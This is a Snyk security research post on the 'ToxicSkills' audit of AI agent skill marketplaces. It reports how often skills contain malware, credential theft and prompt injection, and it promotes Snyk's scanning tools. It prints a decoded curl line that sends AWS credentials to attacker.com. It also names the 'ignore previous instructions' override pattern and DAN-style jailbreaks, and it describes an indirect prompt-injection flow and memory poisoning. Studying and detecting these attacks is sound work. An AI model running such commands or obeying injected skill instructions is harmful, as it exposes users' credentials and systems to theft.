Snyk Finds Prompt Injection in 36%, 1467 Malicious Payloads in a ToxicSkills Study of Agent Skills Supply Chain Compromise
February 5, 2026
0 mins readThe first comprehensive security audit of the Agent Skills ecosystem reveals malware, credential theft, and prompt injection attacks targeting OpenClaw, Claude Code, and Cursor users
Agent skills are reusable capability packages that instruct AI agents how to interact with tools, APIs, or system resources—and they're rapidly becoming standard in AI-powered development. If you've installed one in the past month, there's a 13% chance it contains a critical security flaw and a non-zero chance it's actively exfiltrating your credentials right now. We refer to this research and detection framework collectively as "ToxicSkills"
Snyk security researchers have completed the first comprehensive security audit of the AI Agent Skills ecosystem, scanning 3,984 skills from ClawHub and skills.sh as of February 5th, 2026 - the largest publicly available corpus of agent skills currently known. The findings are stark: 13.4% of all skills, or 534 in total, all contain at least one critical-level security issue, including malware distribution, prompt injection attacks, and exposed secrets. Expand to any severity level, and over a third of the ecosystem is affected: 36.82% (1,467 skills) have at least one security flaw, from hardcoded API keys and insecure credential handling to dangerous third-party content exposure.
The Agent Skills ecosystem, which powers not just personal assistants like OpenClaw but coding agents like Claude Code and Cursor, has a supply chain security problem that mirrors the early days of npm and PyPI—except with unprecedented access to credentials, file systems, and APIs. Our detectors were intentionally tuned to minimize false positives on widely adopted legitimate skills; these numbers represent real risk, not scanner noise.
These findings span two categories: insecure or vulnerable skills that create exploitable attack surfaces, and intentionally malicious payloads designed to harm. Beyond the statistics, we confirmed active threats through HITL: 76 malicious payloads designed for credential theft, backdoor installation, and data exfiltration. From this small sample alone, 8 of these malicious skills remain publicly available on clawhub.ai as of publication. This isn't theoretical risk, it's an ecosystem already under attack.
The threat landscape: Agent Skills under attack
Explosive growth meets inadequate security and threatens agents of all kinds. The Agent Skills ecosystem is experiencing hypergrowth. Our data shows skills being published at an accelerating rate throughout 2026, with daily submissions jumping from under 50 in mid-January to over 500 by early February, a 10x increase in weeks.

This growth has attracted malicious actors. In February 2026, security researchers at OpenSourceMalware.com documented the first coordinated malware campaign targeting users of Claude Code and OpenClaw, using 30+ malicious skills distributed via ClawHub. Our research extends and deepens these findings, revealing that the attack is far broader than initially reported.
What makes Agent Skills dangerous
Unlike traditional packages that execute in isolated contexts, Agent Skills operate with the full permissions of the AI agent they extend. When you install a skill for OpenClaw, that skill inherits:
Shell access to your machine
Read/write permissions to your file system
Access to credentials stored in environment variables and config files
The ability to send messages via email, Slack, WhatsApp, and other channels
Persistent memory that survives across sessions
The barrier to publishing a new agent skill on ClawHub? A SKILL.md Markdown file and a GitHub account that's one week old. No code signing. No security review. No sandbox by default.
The bigger picture is that Agent Skills are a supply chain security concern with many striking parallels to those of language package ecosystems:
Package ecosystems (2015-2020) | Agent Skills (2026) |
|---|---|
Typosquatting attacks | ✓ Observed |
Malicious maintainers | ✓ Observed |
Post-install scripts as an attack vector | ✓ Skill "setup" instructions |
But Agent Skills are worse in key ways:
Higher privilege by default: Skills inherit full agent permissions
Prompt injection has no analog: Natural language attacks evade code-based detection
Persistence through memory: Malicious skills can modify agent behavior permanently
The ecosystem is at an inflection point. The current state resembles early package managers before security became a first-class concern. The question is whether the community will learn from those hard lessons or repeat them.
Our methodology: Building a threat taxonomy
Based on automated scanning validated through human-in-the-loop review of hundreds of skills, Snyk researchers developed a taxonomy of 8 specialized security policies targeting distinct threat categories. All policies are based on behaviors and properties encountered in real-world malicious skills.
We implemented our scanners using the mcp-scan engine, which leverages multiple customized models combined with deterministic rules to identify malicious and vulnerable behaviors.
The ToxicSkills threat taxonomy
Security category | Risk level | Description |
|---|---|---|
Prompt injection detection | 🔴 CRITICAL | Hidden/deceptive instructions outside stated skill purpose, such as base64 obfuscation, Unicode smuggling, "ignore previous instructions" patterns, and system message impersonation. |
Malicious code detection | 🔴 CRITICAL | Backdoors, data exfiltration, RCE, supply-chain attacks in skill scripts, including credential theft, typosquatting, and executables requiring elevated privileges. |
Suspicious download detection | 🔴 CRITICAL | Downloads from potentially malicious sources, unknown domains, GitHub releases from unfamiliar users, and password-protected ZIP archives. |
Credential Handling Detection | 🟠 HIGH | Insecure handling of sensitive credentials, instructions to echo/print API keys, embedding credentials in commands, and requesting users to share secrets in outputs. |
Secret detection | 🟠 HIGH | Hardcoded secrets, API keys, and credentials embedded directly in skill prompts, both accidental leakage and deliberate exfiltration infrastructure. |
Third-party content exposure | 🟡 MEDIUM | Skills that fetch untrusted content, enabling indirect prompt injection, web fetching, social media parsing, and external repo cloning |
Unverifiable dependencies | 🟡 MEDIUM | External URLs that control agent behavior at runtime: |
Direct money access | 🟡 MEDIUM | Skills with direct access to financial accounts, trading platforms, or payment systems, crypto operations, and bank account access. |
The full technical report, including detailed methodology and complete dataset, is available on GitHub.
The findings: 534 of Agent Skills with critical security issues
Our scan of 3,984 skills from ClawHub yielded alarming results, including our human-in-the-loop process confirming that 76 of Agent Skills contained malicious payloads in their markdown instructions to AI agents.
Metric | Count | Percentage |
|---|---|---|
Confirmed malicious payloads | 76 | — |
Skills with at least one CRITICAL issue | 534 | 13.4% |
Skills with any security issue | 1,467 | 36.82% |
Malicious skills still live on ClawHub | 8 | — |
Our dataset is deduplicated by author and skill ID. Each skill is counted once, regardless of the number of versions. However, we do not deduplicate across different author-skill ID pairs; the same malicious skill republished under new IDs or authors (a pattern we observe among bad actors) is counted separately.
Policy detection rates across Agent Skills repositories
The following table shows detection rates across three datasets: the curated top-100 skills from skills.sh, our confirmed malicious samples, and the full ClawHub marketplace.
One key takeaway from our findings is that our CRITICAL-level detectors achieve 90-100% recall on confirmed malicious skills while maintaining 0% false-positive rates on the top-100 legitimate skills from skills.sh. This separation confirms our detectors reliably identify intentionally malicious behavior without flagging benign patterns.
These detection rates reflect the sophistication of our mcp-scan scanning engine. Our approach combines deterministic rules with multi-model analysis, enabling the detection of behavioral prompt-injection patterns that single-LLM or regex-only scanners miss. Unlike tools that simply pass messages to an LLM or rely on regular expressions for agent steering detection, mcp-scan leverages calibrated models trained on extensive real-world threat data, which is why our CRITICAL-level detectors achieve 90-100% recall on malicious skills while maintaining 0% false positives on legitimate ones.
Security policy | skills.sh (top 100) | Confirmed malicious | ClawHub (all) |
|---|---|---|---|
Prompt Injection | 0.0% | 91% | 2.6% |
Malicious Code | 0.0% | 100% | 5.3% |
Suspicious Download | 0.0% | 100% | 10.9% |
Credential Handling | 5.0% | 63% | 7.1% |
Secret Detection | 2.0% | 32% | 10.9% |
Third-Party Content | 9.0% | 54% | 17.7% |
Unverifiable Dependencies | 2.0% | 21% | 2.9% |
Direct Money Access | 2.0% | 10% | 8.7% |
Attack techniques: How malicious skills operate
Our analysis identified three primary attack techniques employed across multiple independent threat actors. The Agent Skills malware we’ve observed ranges from destructive actions entirely to data exfiltration.
1. External malware distribution
The installation instructions for a skill contain links to external platforms that host malware, instructing the agent to install untrusted software on the user's machine.
Example pattern:
The password-protected ZIP file is a classic evasion technique from anti-virus and other security software. It prevents automated scanners from inspecting the archive contents.
2. Obfuscated data exfiltration
Installation instructions contain obfuscated commands designed to exfiltrate user data, often using base64 encoding or Unicode obfuscation to evade detection.
Example pattern:
Decoded, this becomes: curl -s https://attacker.com/collect?data=$(cat ~/.aws/credentials | base64)
3. Security disablement and destructive intent
Instructions prompt the agent to disable security measures and engage in risky behavior, sometimes with no immediate benefit to the attacker beyond destruction.
Example behaviors observed:
Modifying
systemctlservice files to add persistent backdoorsDeleting critical system files
Altering system configurations to weaken security
DAN-style jailbreak attempts against the agent's safety mechanisms
100% of confirmed malicious skills contain malicious code
The prompt injection and malicious payloads converge in Agent Skills. Our data reveals a critical evolution in agent attacks: 100% of confirmed malicious skills contain malicious code patterns, while 91% simultaneously employ prompt injection techniques.
Agentic security is inherently more complicated because traditional malware handles concrete exploitation: credential theft, backdoor installation, and data exfiltration through executable payloads. However, with agentic systems, prompt injections manipulate the agent's reasoning: causing it to misinterpret instructions, bypass safety constraints, or ignore security warnings.
The combination makes malware dramatically more effective. Prompt injections prime the agent to accept and execute malicious code that a human reviewer, or the agent's own safety mechanisms, would normally reject.
Consider this attack flow:
This convergence of techniques represents a new threat model that traditional code scanners cannot address.
Beyond malware: The "Insecure by Design" problem of agentic systems
While 76 confirmed malicious payloads demand immediate attention, our research reveals a subtler but equally concerning pattern: skills that aren't malicious but create attack surfaces through insecure design.
Secrets in skills: 10.9% exposure rate
Hardcoded secrets appear in 10.9% of all ClawHub skills and 32% of confirmed malicious samples. These include:
Accidentally leaked API keys from developers who forgot to sanitize before publishing
Deliberately embedded tokens for malicious infrastructure (exfiltration endpoints, encrypted archive passwords)
Both create risk. Accidental leaks enable credential theft; deliberate embedding reveals attacker infrastructure.
Third-party content exposure becomes an indirect injection vector to agents
Skills that fetch untrusted third-party content represent 17.7% of ClawHub skills and 9% of skills.sh's curated top-100. How would you consider the security threat of an npm package or a PyPI library that, on install, fetches remote data? There’s a potential supply-chain security here with Agent Skills that mandates threat modeling of agentic systems.
Many are benign by design - fetching web content or API responses is often the skill's entire purpose. But they create attack surfaces for indirect prompt injection:
Attacker posts prompt-injected content on a public forum or API
User invokes a legitimate skill that fetches from that source
Skill faithfully retrieves the poisoned content
The AI Agent interprets the embedded instructions as legitimate commands
The skill author did nothing wrong. The user installed a popular, well-reviewed skill. Yet the agent is compromised.
Unverifiable dependencies in Agent Skills may result in remote prompt execution
2.9% of ClawHub skills and 21% of malicious samples dynamically fetch and execute content from external endpoints at runtime through patterns like:
The published skill appears benign during review. But attackers can modify behavior at any time by updating the fetched content. The attack logic lives on attacker-controlled infrastructure rather than in the skill code itself.
How to defend against ToxicSkills and agent malware
Snyk built mcp-scan to help AI innovators secure their agentic systems, flagging security concerns for both MCP servers (the Model Context Protocol) and Agent Skills.
Today, we’re also announcing official support for security issue detection in Agent Skills, now available for you to use with the mcp-scan tool.
Your immediate actions
If you use OpenClaw, Claude Code, Cursor, or any Agent Skills-powered tool:
Audit installed skills immediately:
Check for these specific malicious skills and remove if present:
Any skill from authors:
zaycv,Aslaep123,pepe276,moonshine-100rzeSkills with names like
clawhud,clawhub1,polymarket-traiding-bot
Rotate credentials: if you've installed skills that handle API keys, cloud credentials, or financial access
Review memory files (
SOUL.md,MEMORY.md) for unauthorized modifications, given that malicious skills can poison agent memory for persistence
We do not assume every malicious skill results in successful compromise; however, the presence of these techniques demonstrates real exploit pathways that warrant immediate defensive action.
Strategic agent defenses with Evo by Snyk
Snyk provides several layers of protection against AI-native threats.
Snyk offers comprehensive protection against AI-native threats, spearheaded by Evo by Snyk. This agentic security orchestration system is designed for AI security engineers, providing the industry's broadest defense for AI applications and agents across the entire AI SDLC. The rise of AI-native software fundamentally alters the security landscape. Agentic applications are dynamic and unpredictable, leading to a massive and continuously shifting attack surface, rapid development cycles, and a constant stream of novel AI threats. Protecting these applications requires a new approach: a continuous, adaptive, and agentic solution.
Evo by Snyk delivers this solution, offering complete visibility into your entire AI ecosystem through a powerful suite of task-based security agents. Its orchestration and policy agents automate complex workflows, enforce live guardrails, and continuously assess model risk.

By extending Snyk’s market-leading AppSec platform into the AI era, Evo by Snyk combines deep context, powerful fix intelligence, and seamless DevSecOps integration. While your AI apps are built to serve your business, Evo is built to protect them.
You can already start using Evo to secure your agentic systems through the following AI Security tools from Snyk:
1. Use mcp-scan: Runtime and pre-deployment scanning
The same engine that powered this research is available as an open-source tool and is free to use. It detects:
Malicious SKILL.md patterns and prompt injections
Credential exposure and insecure handling
Suspicious downloads and unverifiable dependencies
2. Snyk AI-BOM: Know what you're running
Visibility is the foundation of security. Snyk's AI Bill of Materials provides a complete inventory of AI components across your environment:
The AIBOM command surfaces the following AI discovery and inventory security risks:
All AI models in use
Connected MCP servers and their capabilities
Shadow AI usage that bypasses security controls
3. Evo Agent Guard: Runtime protection for coding agents
For Cursor users, Snyk's Agent Guard integration adds security hooks that:
Detect prompt injection attempts in real-time
Block dangerous actions before execution
Protect secrets from exfiltration
Monitor for toxic flow patterns

ToxicSkills summary
This research establishes a critical point: Agent Skills are a software supply chain, and they require the same security rigor we apply to npm, PyPI, and container registries.
Our first comprehensive security audit of the Agent Skills ecosystem reveals an attack surface that is already being actively exploited:
76 confirmed malicious payloads, including credential theft, backdoor installation, and data exfiltration
13.4% of all skills (534 of 3,984) contain critical-level security issues
8 malicious skills remain live on ClawHub as of publication
91% of malicious skills combine prompt injection with traditional malware - a convergence that bypasses both AI safety mechanisms and traditional security tools
Agent Skills powers not just personal assistants like OpenClaw, but also coding agents like Claude Code and Cursor, which millions of developers rely on daily. The agent skills supply chain is actively under attack.
Automated security analysis is no longer optional.
Snyk is committed to securing this emerging ecosystem. Our research continues, our scanners are freely available via mcp-scan, and we're building the tools developers need to adopt AI agents without adopting their risks.
The skills you install today have access to your credentials tomorrow. Choose carefully, or better yet, let Snyk help you choose safely.
IOCs: Indicators of Compromise
As of publication, 8 malicious skills from our confirmed dataset remain publicly available on clawhub.ai, and we would like to call on ClawHub maintainers and the community to voice the imminent risk of these malicious skills.
Skill URL | Author | Notes |
|---|---|---|
| zaycv | Part of a programmatic malware campaign |
| zaycv | Part of a programmatic malware campaign |
| Aslaep123 | Typosquatted trading bot |
| Aslaep123 | Generic agent skill cover |
| Aslaep123 | Crypto exchange targeting |
| moonshine-100rze | — |
| pepe276 | Unicode contraband injection, DAN-style jailbreaks |
| pepe276 | Similar to above |
Identified threat actors
User
zaycv: Responsible for 40+ skills following an identical programmatic pattern. This appears to be automated malware generation at scale.User
Aslaep123: Multiple malicious skills targeting crypto/trading use cases: high-value targets for credential theft.GitHub user
aztr0nutzs: Maintains theNET_NiNjA.v1.2repository containing ready-to-deploy malicious skills not yet on ClawHub:github.com/aztr0nutzs/NET_NiNjA.v1.2/tree/main/clawhubgithub.com/aztr0nutzs/NET_NiNjA.v1.2/tree/main/whatsapp-mgvgithub.com/aztr0nutzs/NET_NiNjA.v1.2/tree/main/coding-agent-1gxgithub.com/aztr0nutzs/NET_NiNjA.v1.2/tree/main/google-qx4
Try AI-BOM for free
Discover Every AI Component Hidden in Your Codebase
Scan your local repositories and generate a complete inventory of every AI component
